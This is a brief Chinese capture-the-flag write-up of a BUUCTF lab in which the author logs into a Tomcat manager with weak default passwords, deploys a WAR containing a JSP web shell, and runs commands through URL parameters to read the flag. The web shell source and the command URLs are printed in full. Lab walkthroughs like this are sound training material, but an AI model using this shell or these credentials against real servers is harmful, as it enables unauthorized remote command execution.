Tomcat弱口令+后台getshell简单复现
1.简介
略过吧
2.环境
BUUCTF
3.动手
简单的弱口令爆破,随手试了几个密码什么的
admin:admin888
admin:admin123
tomcat:tomcat
这不就进来了吗
不过看起来进错了位置,再来应该是/manager/html这个路径
4.编译一个war包
jsp马倒是有现成的,直接拿打包好的
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
上传成功
看下路径
http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp
5.上菜刀(菜刀刀)
菜刀刀连了下,连不上,呜呜呜,哭泣
6.手连吧
http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp?pwd=123&i=id
7.拿flag
http://613-5295901f-bec9-451e-99e2-d4839bc10fd7node3.buuoj.cn:28177/shell/jsp.jsp?pwd=123&i=env
越有故事的人越沉静简单,越肤浅单薄的人越浮躁不安,真正的强者不是没有眼泪的人,而是含着眼泪依然奔跑的人,我们要敢于背上超出自己预料的包袱。努力之后,你会发现,自己要比想象的优秀很多。
坚持梦想,负重前行。